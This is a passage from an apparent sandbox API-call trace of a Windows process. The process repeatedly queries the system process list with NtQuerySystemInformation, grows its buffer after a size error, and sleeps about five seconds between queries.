RegionSize=0xdea68*=0x10000) returned 0x0 [0257.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.383] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.408] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.465] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.474] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.481] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.491] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.505] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.519] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.526] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.541] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.549] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 